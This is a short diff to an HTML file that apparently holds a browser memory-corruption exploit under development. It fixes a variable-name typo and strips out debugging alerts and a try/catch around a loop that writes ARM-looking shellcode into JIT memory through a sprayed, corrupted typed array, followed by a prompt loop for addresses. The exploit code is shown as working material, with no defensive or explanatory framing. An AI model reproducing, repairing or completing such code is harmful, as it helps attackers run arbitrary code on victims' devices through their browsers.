--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start43");
+alert("start44");
 function func(){
 for(var i=0;i<0x1000;i++){ 
 
@@ -154,14 +154,9 @@ var jit_index=typedarray_index+0x38/4;
 var typedarray=spray[spray_index];
 var myarr=arrcvs[0];
 var shellcode="\ub004\ue52d";//\ub000\ue28d\u3002\ue3a0\u0003\ue1a0\ud000\ue28b\u0800\ue8bd\uff1e\ue12f";
-try{
- for(var i=0;i<shellocode.length;i++){
+ for(var i=0;i<shellcode.length;i++){
  myarr[0]=shellcode.charCodeAt(i);
  typedarray[jit_index]+=2;
- alert(i);
-}
-}catch(e){
- alert(e);
 }
 while(1){
 a=prompt("addr");
